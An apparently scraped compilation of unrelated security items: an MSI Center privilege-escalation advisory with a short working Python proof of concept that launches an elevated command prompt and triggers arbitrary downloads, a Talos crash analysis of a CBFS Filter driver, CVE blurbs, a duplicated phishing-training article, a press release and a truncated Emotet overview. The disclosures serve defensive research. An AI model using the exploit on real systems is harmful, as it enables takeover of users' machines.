An issue in the component MSI.TerminalServer.exe of MSI Center v1.0.41.0 allows attackers to escalate privileges via a crafted TCP packet.

Missing input validation and missing authentication allow attackers with the ability to connect to TCP/IP ports on localhost:26822 (e.g. any low-privileged user space process) to download and/or launch arbitraty executables with elevated privileges.

**General**

*   Affected product: MSI Center by Micro-Star Int’l Co., Ltd.
*   Affected version: < 1.0.45.0, e.g. 1.0.41.0
*   CVE-2022-31877

**Description**

MSI Center, a tool suite provided by MSI to configure and manage MSI mainboards, includes an executable MSI.TerminalServer.exe which is installed as a privileged service by default and allows incoming TCP/IP connections on localhost:26822. Via the TCP/IP channel, in version 1.0.41.0, it accepts several JSON-formatted command packets without any authentication, including commands which download files from the web and launch executables with elevated privileges.

While these commands are meant to download and install updates of MSI Center, missing authentication allows attackers to trigger a download of arbitrary files form the web to the local file system. Missing input validation enables attackers to launch arbitrary executables, including the downloaded ones, with elevated permissions by employing path traversal techniques.

Combined, these vulnerabilities could, for example, serve as an entry point for user-space applications (like email attachments) to fully compromise a system, including installation of malware or ransomware.

**Proof of Concept**

The following simple Python example will start an elevated Administrator command prompt when executed on a machine running MSI Center.

    import socket
    import json
    
    packet = {
        "Type": "RunSetupModule",
        "Content": json.dumps({
            "Dependent": [{
                "File": "..\\..\\..\\Windows\\system32\\cmd.exe"
            }],
            "DependentIndex": 0,
            "ProgressStatus": 21
        })
    }
    
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('localhost', 26822))
        s.sendall(json.dumps(packet).encode('utf8'))

Similarly, an arbitray file download can be triggered via the DownloadModule packet type:

    packet = {
        "Type": "DownloadModule",
        "Content": json.dumps({
            "ProcessURL": "https://example.com/foo.exe",
            "Dependent": [{
                "File": "foo.exe"
            }],
            "DependentIndex": 0
        })
    }

**Timeline**

*   May 19, 2022: Contacted vendor with a detailed report and PoC
*   May 25, 2022: Issue partially confirmed by vendor
*   May 25, 2022: Supplied more details including screencast of PoC
*   May 27, 2022: Vendor confirms they are working on a fix
*   June 3, 2022: CVE number assigned
*   June 3, 2022: Vendor reports the issue is fixed in MSI.TerminalServer.exe 3.2022.0527.01 by introducing CA signature validation before launching executables
*   July 5, 2022: I was able to update to a recent MSI Center version and confirm the issue has been fixed (i.e. the PoC is no longer working)
*   July 8, 2022: Public disclosure

**Thank You and Side Note**

I would like to thank MSI for quickly fixing this issue. However, it was difficult to find a contact in MSI to report this issue. I would like to encourage MSI to establish and publish a process to report security vulnerabilities in their products and add an easier way to contact security, without going through various tiers of technical support first. A first step could be to set up a dedicated email address and a /.well-known/security.txt file for easily finding contact information.

CVE-2022-31877: Privilege Escalation in MSI Center – patsch.dev

The DLMS-compatible, zero-trust meter-level security is built into the Renesas smart meter solutions, enabling smart meter manufacturers to get to market faster with built-in advanced security solutions.

**HOD HASHARON, Israel, Nov. 28, 2022 /PRNewswire/** — NanoLock Security, a leading cybersecurity provider for IIoT and OT devices and machines, today announces built-in, zero-trust meter-level cyber security protection for Renesas Electronics Corp. customers' smart meter products.

As the global energy economy worsens and cyberthreats like energy fraud and theft grow more frequent, Renesas' customers in meter manufacturing will now have NanoLock Security's DLMS compatible, zero-trust cyber protection built-in to their meters with no impact on performance, functionality, or deployment speed, giving them a significant competitive advantage.

This new solution gives Renesas' customers, renowned smart meter manufacturers, the ability to quickly build a product that is secure from all attack vectors, including insider manipulation and human error, without any disruptions to meter operations or product time to market.

"Edge devices like advanced metering infrastructure (AMI) are vulnerable targets for cyber attackers and can compromise service integrity, revenue, and safety," said David Stroud, Chief Revenue Officer, NanoLock Security. "With our meter-level protection built into Renesas metering solutions, Renesas customers can now bring secure and tamper-proof smart meters to the market faster, a critical edge in a hotly competitive industry."

NanoLock will be exhibiting the new solution at the Enlit Europe show in Frankfurt Germany at Altlatica Booth #12.1.C132.

To find out how manufacturers can get the new Renesas MCUs into their smart meters, visit the Renesas RL78 Partner page. To learn more about NanoLock, visit NanoLockSecurity.com.

**About NanoLoc****k Security**

NanoLock Security protects the operational integrity of connected devices, smart meters, and machines against cyber events and human error to maintain business continuity, improve safety and safeguard revenues.

Trusted by critical infrastructure customers, such as utilities, industrial and manufacturing companies, NanoLock Security protects power generation and energy management, industrial, water and wastewater plants, as well as food & beverage manufacturing, while ensuring compliance with international security standards and guidelines. NanoLock is headquartered in Israel with offices in the US, Europe, and Japan. Visit www.nanolocksecurity.com for more information and follow NanoLock on Twitter and LinkedIn.

SOURCE: NanoLock Security

NanoLock Brings Built-In Meter-Level Cybersecurity to Renesas Customers

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information.

**The hard news:** they're often successful, have a long-lasting negative impact on your organization and employees, including:

*   Loss of Money
*   Reputation damage
*   Loss of Intellectual property
*   Disruptions to operational activities
*   Negative effect on company culture

**The harder news:** These often could have been easily avoided.

Phishing, educating your employees, and creating a cyber awareness culture? These are topics we're sensitive to and well-versed in. So, how can you effectively protect your organization against phishing attempts? These best practices will help transform your employees' behavior and build organizational resilience to phishing attacks.

****Plan for total workforce training:****

According to the 2022 Tessian Security Cultures Report, "security leaders underestimate just how much they should be a part of the employee experience" across onboarding, role changes, offboarding, relocations, and day-to-day activities.

But we've repeatedly seen that ad hoc, scattershot employee training attempts don't work. If you want sufficient internal defenses against sophisticated phishing threats, you should train 100% of your employees monthly.

Granted, it isn't easy if your team is growing rapidly or spread across different locations and time zones. Yet doing anything less than 100% employee training leaves you with too many security holes and opportunities for hackers to break in. Unfortunately, it also means you have no way of knowing your employees' level of threat awareness or whether they know how to react to threats. You might be missing your weakest link or getting into a scenario that could have been easily avoided.

****Apply Continuous Training****

Ever been told there'll be a fire evacuation drill? Likely, you weren't caught off guard when the practice started and could have paid more attention. That's the thing about drills; they're in place to prepare us for present and future threats.

Cybersecurity training is no different. While it can quickly become ticking a compliance box to satisfy minimum requirements. To prevent it, you need to catch your staff off guard. Knowing that a threat could present itself at any time keeps employees vigilant and accountable between more extensive training campaigns.

It would be best if you kept giving your employees these unexpected opportunities to learn on an ongoing basis. They will likely make easily avoidable mistakes if they only receive occasional simulations. You might miss new employees without sufficient cybersecurity training, or it might take time for them to revisit and build on this training.

**The solution:** Conducting consistent cybersecurity training is the best way to keep it top of mind for everyone—train for yesterday, today, and tomorrow.

****Deploy Adaptive Content****

You might use cybersecurity understanding or departments as categories. Start by segmenting your workforce into groups. Then, develop adaptive training based on each group's needs - and even based on individual behavior. That's critical to adequately address the challenges of given scenarios of future attack campaigns.

These can include data or password requests, messages from legitimate sources, or realistic content tailored to an organization's specific role or department.

You strengthen employees' defenses by adapting your content to individual responses and specific attack vectors. Doing so turns the human element from a security gap to a security advantage.

****Localize Your Cybersecurity Training****

English might be your corporate language, but it might not be every employee's mother tongue, and cultural contexts might be perceived differently in some branches.

Using employees' mother tongue within a location's cultural context will dramatically enhance their learning retention. By citing local references (such as national holidays, significant news sources, popular social media platforms, and more), you make your simulations more believable and relatable. Your employees will likely pay better attention during training and will be less susceptible to attacks.

Lastly, there could be different implications regarding email compliance standards in different places. Ensure your team is aware of that and incorporate the necessary precautions in these locations' training.

****Back Your Cyber Training with Data Science****

In our experience, one in every five employees is a "serial clicker." Serial clickers click, open, and download attachments that often place them and your organization in danger. They might be a new or existing employee. We've seen it all, from entry-level positions to company stakeholders.

They're not trained or equipt to reliably identify phishing attacks, nor understand how dangerous and their destructive impact. So they keep clicking links in emails that they shouldn't have opened.

**The good news:** We believe serial clickers can be cured because we've seen it repeatedly happen with employee training and education.

We know that serial clickers are just some of the ones to worry about. Employees respond differently to a variety of attack vectors. It's recommended to use data science to understand how employee groups within your organization - from new hires, executive leadership, and veteran employees - respond to potential threats.

Once you analyze the data to understand these groups' behavior, you can develop programs that shift them toward a more discerning approach to email management based on their specific needs and their current place in their cybersecurity awareness journey.

These programs must include expert knowledge, adjusted frequency, timely reminders, custom simulations, and training content designed for highly susceptible groups while respecting employees' privacy.

****Automate Your Cybersecurity Education****

Regardless of the size of your organization, the complexity required to run a training program like the one described above can be challenging. Whether you're looking at it from the perspective of time, resources, or economics, it's almost impossible without a truly automated solution that has expert knowledge baked into the software.

CybeReady provides a fully-automated platform powered by machine learning technology. It mitigates the risks of human error through an educational approach that continuously provides frequent, adaptive, engaging training. Get in touch today to foster a culture that cares, retains information to keep your organization safe, and feels accountable. Make your organization cyber-ready. Learn how you can upgrade your security awareness program with a short, perosanilized demo.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The 5 Cornerstones for an Effective Cyber Security Awareness Training

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information. 
The hard news: they're often successful, have a long-lasting negative impact on your organization and employees, including:

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information.

**The hard news:** they're often successful, have a long-lasting negative impact on your organization and employees, including:

*   Loss of Money
*   Reputation damage
*   Loss of Intellectual property
*   Disruptions to operational activities
*   Negative effect on company culture

**The harder news:** These often could have been easily avoided.

Phishing, educating your employees, and creating a cyber awareness culture? These are topics we're sensitive to and well-versed in. So, how can you effectively protect your organization against phishing attempts? These best practices will help transform your employees' behavior and build organizational resilience to phishing attacks.

****Plan for total workforce training:****

According to the 2022 Tessian Security Cultures Report, "security leaders underestimate just how much they should be a part of the employee experience" across onboarding, role changes, offboarding, relocations, and day-to-day activities.

But we've repeatedly seen that ad hoc, scattershot employee training attempts don't work. If you want sufficient internal defenses against sophisticated phishing threats, you should train 100% of your employees monthly.

Granted, it isn't easy if your team is growing rapidly or spread across different locations and time zones. Yet doing anything less than 100% employee training leaves you with too many security holes and opportunities for hackers to break in. Unfortunately, it also means you have no way of knowing your employees' level of threat awareness or whether they know how to react to threats. You might be missing your weakest link or getting into a scenario that could have been easily avoided.

****Apply Continuous Training****

Ever been told there'll be a fire evacuation drill? Likely, you weren't caught off guard when the practice started and could have paid more attention. That's the thing about drills; they're in place to prepare us for present and future threats.

Cybersecurity training is no different. While it can quickly become ticking a compliance box to satisfy minimum requirements. To prevent it, you need to catch your staff off guard. Knowing that a threat could present itself at any time keeps employees vigilant and accountable between more extensive training campaigns.

It would be best if you kept giving your employees these unexpected opportunities to learn on an ongoing basis. They will likely make easily avoidable mistakes if they only receive occasional simulations. You might miss new employees without sufficient cybersecurity training, or it might take time for them to revisit and build on this training.

**The solution:** Conducting consistent cybersecurity training is the best way to keep it top of mind for everyone—train for yesterday, today, and tomorrow.

****Deploy Adaptive Content****

You might use cybersecurity understanding or departments as categories. Start by segmenting your workforce into groups. Then, develop adaptive training based on each group's needs - and even based on individual behavior. That's critical to adequately address the challenges of given scenarios of future attack campaigns.

These can include data or password requests, messages from legitimate sources, or realistic content tailored to an organization's specific role or department.

You strengthen employees' defenses by adapting your content to individual responses and specific attack vectors. Doing so turns the human element from a security gap to a security advantage.

****Localize Your Cybersecurity Training****

English might be your corporate language, but it might not be every employee's mother tongue, and cultural contexts might be perceived differently in some branches.

Using employees' mother tongue within a location's cultural context will dramatically enhance their learning retention. By citing local references (such as national holidays, significant news sources, popular social media platforms, and more), you make your simulations more believable and relatable. Your employees will likely pay better attention during training and will be less susceptible to attacks.

Lastly, there could be different implications regarding email compliance standards in different places. Ensure your team is aware of that and incorporate the necessary precautions in these locations' training.

****Back Your Cyber Training with Data Science****

In our experience, one in every five employees is a "serial clicker." Serial clickers click, open, and download attachments that often place them and your organization in danger. They might be a new or existing employee. We've seen it all, from entry-level positions to company stakeholders.

They're not trained or equipt to reliably identify phishing attacks, nor understand how dangerous and their destructive impact. So they keep clicking links in emails that they shouldn't have opened.

**The good news:** We believe serial clickers can be cured because we've seen it repeatedly happen with employee training and education.

We know that serial clickers are just some of the ones to worry about. Employees respond differently to a variety of attack vectors. It's recommended to use data science to understand how employee groups within your organization - from new hires, executive leadership, and veteran employees - respond to potential threats.

Once you analyze the data to understand these groups' behavior, you can develop programs that shift them toward a more discerning approach to email management based on their specific needs and their current place in their cybersecurity awareness journey.

These programs must include expert knowledge, adjusted frequency, timely reminders, custom simulations, and training content designed for highly susceptible groups while respecting employees' privacy.

****Automate Your Cybersecurity Education****

Regardless of the size of your organization, the complexity required to run a training program like the one described above can be challenging. Whether you're looking at it from the perspective of time, resources, or economics, it's almost impossible without a truly automated solution that has expert knowledge baked into the software.

CybeReady provides a fully-automated platform powered by machine learning technology. It mitigates the risks of human error through an educational approach that continuously provides frequent, adaptive, engaging training. Get in touch today to foster a culture that cares, retains information to keep your organization safe, and feels accountable. Make your organization cyber-ready. Learn how you can upgrade your security awareness program with a short, perosanilized demo.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

A null pointer dereference vulnerability exists in the handle_ioctl_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

**SUMMARY**

A null pointer dereference vulnerability exists in the handle\_ioctl\_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Callback technologies CBFS Filter 20.0.8317

**PRODUCT URLS**

CBFS Filter - https://www.callback.com/cbfsfilter/

**CVSSv3 SCORE**

6.2 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-476 - NULL Pointer Dereference

**DETAILS**

A windows device driver is almost like a kernel DLL that, once loaded, provides additional features. In order to communicate with these device drivers, Windows has a major component named Windows I/O Manager. The Windows IO Manager is responsible for the interface between user applications and device drivers. It implements I/O Request Packets (IRP) to enable the communication with the devices drivers, answering to all I/O requests. For more information see the Microsoft website.

The driver is responsible for creating a device interface with different functions to answer to specific codes, named major code function. If the designer wants to implement customized functions into a driver, there is one major function code named IRP_MJ_DEVICE_CONTROL. By handling such major code function, device drivers will support specific I/O Control Code (IOCTL) through a dispatch routine.

The Windows I/O Manager provides three different methods to enable the shared memory: Buffered I/O, Direct I/O, Neither I/O.  
Without getting into the details of the IO Manager mechanisms, the method Buffered I/O is often the easiest one for handling memory user buffers from a device perspective.  
The I/O Manager is providing all features to enable device drivers sharing buffers between userspace and kernelspace. It will be responsible for copying data back and forth.

Let’s see some examples of routines (which you should not copy as is) that explain how things work.  
When creating a driver, you’ll have several functions to implement, and you’ll find some dispatcher routines to handle different IRP as follows:

    extern "C"
    NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT pDriverObject, _In_ PUNICODE_STRING RegistryPath)
    {
     [...]
            pDriverObject->DriverUnload = DriverUnload;
            pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverIOctl;
            pDriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreate;
            pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverClose;
    [...]
    }
    

The DriverEntry is the function main for a driver. This is the place where initializations start.

We can see for example the pDriverObject which is a PDRIVER_OBJECT object given by the system to associate different routines, to be called against specific codes, into the Majorfunction table IRP_MJ_DEVICE_CONTROL for DriverIOctl etc.

Then later inside the driver you’ll see the implementation of the DriverIOctl routine responsible for handling the IOCTL code. It can be something like below:

    NTSTATUS DriverIOctl(PDEVICE_OBJECT pDevObject, PIRP pIrp)
    {
       [...]
        auto pIrpSp = IoGetCurrentIrpStackLocation(pIrp);
        switch (pIrpSp->Parameters.DeviceIoControl.IoControlCode)
        {
    
        case IO_CREATE_EXAMPLE:
                ioctl_inbuffer_data = (ioctl_inbuffer*)pIrp->AssociatedIrp.SystemBuffer;
                auto InputBufferLength = pIrpSp->Parameters.DeviceIoControl.InputBufferLength;
                auto OutputBufferLength = pIrpSp->Parameters.DeviceIoControl.OutputBufferLength;
         [...] some code
    
            pIrp->IoStatus.Information = 0;
            pIrp->IoStatus.Status = status;
    
            break;
         }
         
         pIrp->IoStatus.Information = some value;
         pIrp->IoStatus.Status = status;
         return status;
    }
    

First we can see the pIrp pointer to an IRP structure (the description would be out of the scope of this document). Keep in mind this pointer will be useful for accessing data.  
So here for example we can observe some switch-case implementation depending on the IoControlCode IOCTL. When the device driver gets an IRP with code value IO_CREATE_EXAMPLE, it performs the operations below the case. To get into the buffer data exchanged between userspace and kernelspace and vice-versa, we’ll look into SystemBuffer passed as an argument through the pIrp pointer.

On the device side, the pointer inside an IRP represents the user buffer, usually a field named Irp->AssociatedIrp.SystemBuffer, when the buffered I/O mechanism is chosen. The specification of the method is indicated by the code itself.  
On the userspace side, an application would need to gain access to the device driver symbolic link if it exists, then send some ioctl requests as follows:

    success  = ::DeviceIoControl(
        ghDevice,
        IO_CREATE_EXAMPLE,                  // control code
        &gpIoctl,                           // input buffer
        sizeof(struct ioctl_inbuffer),      // input buffer length
        &gpIoctl,                           // output buffer
        sizeof(struct ioctl_inbuffer),      // output buffer length
        &returned,
        nullptr
    );
    

Such a call will result in an IRP with a major code IRP_MJ_DEVICE_CONTROL and a control code to IO_CREATE_EXAMPLE. The buffer passed from userspace here as input gpIoctl, and output will be accessible from the device driver in the kernelspace via pIrp->AssociatedIrp.SystemBuffer. The lengths specified on the DeviceIoControl parameters will be used to build the IRP, and the device would be able to get them into the InputBufferLength and the OutputBufferLength respectively.

Now below we’ll see one example of sending a correct output buffer length directly without providing the driver some previous context which can lead to different behaviors and more frequently a local denial of service and blue screen of death through the usage of the device driver cbfilter20.

After the system has normally booted and the driver is running, sending an IOCTL 0x83150 with a valid buffer input size and some specific data length leads to the following situation

      CONTEXT:  ffff9c0ee2b66560 -- (.cxr 0xffff9c0ee2b66560)
        rax=0000000000001000 rbx=0000000000000000 rcx=0000000000000000
        rdx=ffffc408362e0a10 rsi=ffffc4083492a570 rdi=0000000000000000
        rip=fffff80258bc4eb4 rsp=ffff9c0ee2b66f60 rbp=ffff9c0ee2b67150
         r8=ffffc40839fe1a30  r9=0000000000083150 r10=fffff80258ba5780
        r11=0000000000000000 r12=ffffc4083a7740c0 r13=ffffc408362e0940
        r14=ffffc40839fe1a01 r15=0000000000000000
        iopl=0         nv up ei pl nz na pe nc
        cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050302
        cbfilter20!handle_ioctl_83150+0xd0:
        fffff802`58bc4eb4 488b4308        mov     rax,qword ptr [rbx+8] ds:002b:00000000`00000008=????????????????
        Resetting default scope
    
        PROCESS_NAME:  python.exe
    

When looking at pseudo code corresponding to the culprit function we can see the following:

    LINE1   __int64 __fastcall handle_ioctl_83150(_DEVICE_OBJECT *a1, PIRP a2)
    LINE2   {
            [...]
    LINE71    v3 = 0i64;
    LINE72    Object = 0i64;
    LINE73    v4 = 0;
    LINE74    SectionHandle = 0i64;
    LINE75    Handle = 0i64;
    LINE76    v48 = 0i64;
    LINE77    buffer_0x10000 = 0i64;
    LINE78    v50 = 0i64;
    LINE79    CurrentStackLocation = a2->Tail.Overlay.CurrentStackLocation;
    LINE80    SystemBuffer = (struct_SystemBuffer *)a2->AssociatedIrp.SystemBuffer;
    LINE81    if ( CurrentStackLocation->Parameters.DeviceIoControl.InputBufferLength != SystemBuffer->size_len + 0x20i64 )
    LINE82    {
    LINE83      l_FileObject = 0i64;
    LINE84  invalid_param:
    LINE85      v14 = STATUS_INVALID_PARAMETER;
    LINE86      goto LABEL_68;
    LINE87    }
    LINE88    FileObject = CurrentStackLocation->FileObject;
    LINE89    must_be_1 = SystemBuffer->must_be_1;
    LINE90    if ( (must_be_1 & 1) != 0 )
    LINE91    {
    LINE92      v4 = 1;
    LINE93      v11 = 0i64;
    LINE94      v12 = 4096i64;
    LINE95    }
    LINE96    else
    LINE97    {
    LINE98      if ( (must_be_1 & 2) == 0 )
    LINE99      {
    LINE100       l_FileObject = (__int64)CurrentStackLocation->FileObject;
    LINE101       goto invalid_param;
    LINE102     }
    LINE103     v11 = 4096i64;
    LINE104     v12 = 0i64;
    LINE105   }
    LINE106   v53 = v12;
    LINE107   MaxCount.QuadPart = v11;
    LINE108   v59 = v12;
    LINE109   v52 = v11;
    LINE110   FsContext2 = (__int64)FileObject->FsContext2;
    LINE111   v58 = FsContext2;
    LINE112   v39 = *(_QWORD *)(FsContext2 + 8);
    LINE113   v54 = v39;
    LINE114   v14 = ObReferenceObjectByHandle(SystemBuffer->handle, 0, 0i64, 0, &Object, 0i64);
    LINE115   v38 = v14;
    LINE116   if ( v14 < 0 )
    LINE117   {
    LINE118     Object = 0i64;
    LINE119     v3 = 0i64;
    LINE120 LABEL_9:
    LINE121     l_FileObject = v39;
    LINE122     goto free_buffer;
    LINE123   }
    LINE124   v15 = *((_QWORD *)Object + 4);
    LINE125   v40 = v15;
    LINE126   v55 = v15;
    LINE127   a2->IoStatus.Information = 0i64;
            [...]
    LINE380   a2->IoStatus.Status = v14;
    LINE381   return (unsigned int)v14;
    LINE382 }
    

The crash is happening at LINE110, while dereferencing FileObject->FsContext2. The issue is happening as there is no null check done against FileObject and is assumed to be always valid, which is not the case if the IRP packet is sent directly. The FileObject is derived directly from CurrentStackLocation at LINE88, which is derived itself from the IRP packet at LINE79. A specially-crafted I/O request packet bypassing the checks done at LINE80 & LINE90 will lead to denial of service immediately.

**Crash Information**

    1: kd> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************
    
    SYSTEM_SERVICE_EXCEPTION (3b)
    An exception happened while executing a system service routine.
    Arguments:
    Arg1: 00000000c0000005, Exception code that caused the bugcheck
    Arg2: fffff80258bc4eb4, Address of the instruction which caused the bugcheck
    Arg3: ffff9c0ee2b66560, Address of the context record for the exception that caused the bugcheck
    Arg4: 0000000000000000, zero.
    
    Debugging Details:
    ------------------
    
    
    KEY_VALUES_STRING: 1
    
        Key  : Analysis.CPU.mSec
        Value: 2608
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 3502
    
        Key  : Analysis.Init.CPU.mSec
        Value: 32186
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 670833
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 96
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
    
    BUGCHECK_CODE:  3b
    
    BUGCHECK_P1: c0000005
    
    BUGCHECK_P2: fffff80258bc4eb4
    
    BUGCHECK_P3: ffff9c0ee2b66560
    
    BUGCHECK_P4: 0
    
    CONTEXT:  ffff9c0ee2b66560 -- (.cxr 0xffff9c0ee2b66560)
    rax=0000000000001000 rbx=0000000000000000 rcx=0000000000000000
    rdx=ffffc408362e0a10 rsi=ffffc4083492a570 rdi=0000000000000000
    rip=fffff80258bc4eb4 rsp=ffff9c0ee2b66f60 rbp=ffff9c0ee2b67150
     r8=ffffc40839fe1a30  r9=0000000000083150 r10=fffff80258ba5780
    r11=0000000000000000 r12=ffffc4083a7740c0 r13=ffffc408362e0940
    r14=ffffc40839fe1a01 r15=0000000000000000
    iopl=0         nv up ei pl nz na pe nc
    cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050302
    cbfilter20!handle_ioctl_83150+0xd0:
    fffff802`58bc4eb4 488b4308        mov     rax,qword ptr [rbx+8] ds:002b:00000000`00000008=????????????????
    Resetting default scope
    
    PROCESS_NAME:  python.exe
    
    STACK_TEXT:  
    ffff9c0e`e2b66f60 fffff802`58bbc878     : ffffc408`3492a570 ffffc408`362e0940 ffffeb80`01414701 00000000`00000000 : cbfilter20!handle_ioctl_83150+0xd0
    ffff9c0e`e2b67130 fffff802`58ba57f3     : c40839fe`00000000 ffffc408`362e0940 00000000`00000001 ffffc408`3492a570 : cbfilter20!DispatchDeviceControl+0x2d4
    ffff9c0e`e2b67160 fffff802`5509b7d5     : 00000000`0000000e 00000000`00000000 ffffc408`362e0940 00000000`00000001 : cbfilter20!fn_IRP_MJ_DEVICE_CONTROL+0x73
    ffff9c0e`e2b671c0 fffff802`55481a08     : ffff9c0e`e2b67540 ffffc408`362e0940 00000000`00000001 ffffc408`3ad7e0c0 : nt!IofCallDriver+0x55
    ffff9c0e`e2b67200 fffff802`554812d5     : 00000000`00083150 ffff9c0e`e2b67540 00000000`00000005 ffff9c0e`e2b67540 : nt!IopSynchronousServiceTail+0x1a8
    ffff9c0e`e2b672a0 fffff802`55480cd6     : 00007ff8`86a68e80 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x5e5
    ffff9c0e`e2b673e0 fffff802`55214ab5     : 00000000`00000000 00000000`00000000 00000000`00000000 000000e2`7d7ecb18 : nt!NtDeviceIoControlFile+0x56
    ffff9c0e`e2b67450 00007ff8`c726ce54     : 00007ff8`c4aab04b ffffffff`ff9c9830 00000000`00000000 000000e2`7d7eeb48 : nt!KiSystemServiceCopyEnd+0x25
    000000e2`7d7eea78 00007ff8`c4aab04b     : ffffffff`ff9c9830 00000000`00000000 000000e2`7d7eeb48 000000e2`7d7eec40 : ntdll!NtDeviceIoControlFile+0x14
    000000e2`7d7eea80 00007ff8`c6a05611     : 00000000`00083150 000000e2`7d7eec40 00000236`fb968d00 00007ff8`86b0694d : KERNELBASE!DeviceIoControl+0x6b
    000000e2`7d7eeaf0 00007ff8`86a4648c     : 00000000`00000022 000000e2`7d7eec40 000000e2`7d7eec40 00000000`00000001 : KERNEL32!DeviceIoControlImplementation+0x81
    000000e2`7d7eeb40 00000000`00000022     : 000000e2`7d7eec40 000000e2`7d7eec40 00000000`00000001 00000000`00000000 : win32file!PyInit_win32file+0xf98c
    000000e2`7d7eeb48 000000e2`7d7eec40     : 000000e2`7d7eec40 00000000`00000001 00000000`00000000 000000e2`00000000 : 0x22
    000000e2`7d7eeb50 000000e2`7d7eec40     : 00000000`00000001 00000000`00000000 000000e2`00000000 000000e2`7d7eeba0 : 0x000000e2`7d7eec40
    000000e2`7d7eeb58 00000000`00000001     : 00000000`00000000 000000e2`00000000 000000e2`7d7eeba0 00000000`00000000 : 0x000000e2`7d7eec40
    000000e2`7d7eeb60 00000000`00000000     : 000000e2`00000000 000000e2`7d7eeba0 00000000`00000000 000000e2`7d7eeba8 : 0x1
    
    
    SYMBOL_NAME:  cbfilter20!handle_ioctl_83150+d0
    
    MODULE_NAME: cbfilter20
    
    IMAGE_NAME:  cbfilter20.sys
    
    STACK_COMMAND:  .cxr 0xffff9c0ee2b66560 ; kb
    
    BUCKET_ID_FUNC_OFFSET:  d0
    
    FAILURE_BUCKET_ID:  0x3B_c0000005_cbfilter20!handle_ioctl_83150
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    FAILURE_ID_HASH:  {2a1744df-b799-38ae-0bd4-b13f23c537e7}
    
    Followup:     MachineOwner
    ---------
    

**TIMELINE**

2022-11-04 - Vendor Disclosure  
2022-11-04 - Initial Vendor Contact  
2022-11-22 - Public Release

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-43588: TALOS-2022-1647 || Cisco Talos Intelligence Group

A null pointer dereference vulnerability exists in the handle_ioctl_0x830a0_systembuffer functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

CVE-2022-43590: TALOS-2022-1649 || Cisco Talos Intelligence Group

A null pointer dereference vulnerability exists in the handle_ioctl_8314C functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

CVE-2022-43589: TALOS-2022-1648 || Cisco Talos Intelligence Group

GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.

CVE-2022-45939

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.

**Why is everyone scared of Emotet?**

Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns.

The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory.

It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware.

The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The Emotet team constantly changes its tactics, techniques, and procedures to ensure that the existing detection rules cannot be applied. As part of its strategy to stay invisible in the infected system, the malicious software downloads extra payloads using multiple steps.

And the results of Emotet behavior are devastating for cybersecurity specialists: the malware is nearly impossible to remove. It spreads quickly, generates faulty indicators, and adapts according to attackers' needs.

**How has Emotet upgraded over the years?**

Emotet is an advanced and constantly changing modular botnet. The malware started its journey as a simple banking trojan in 2014. But since then, it has acquired a bunch of different features, modules, and campaigns:

*   2014\. Money transfer, mail spam, DDoS, and address book stealing modules.
*   2015\. Evasion functionality.
*   2016\. Mail spam, RIG 4.0 exploit kit, delivery of other trojans.
*   2017\. A spreader and address book stealer module.
*   2021\. XLS malicious templates, uses MSHTA, dropped by Cobalt Strike.
*   2022\. Some features remained the same, but this year also brought several updates.

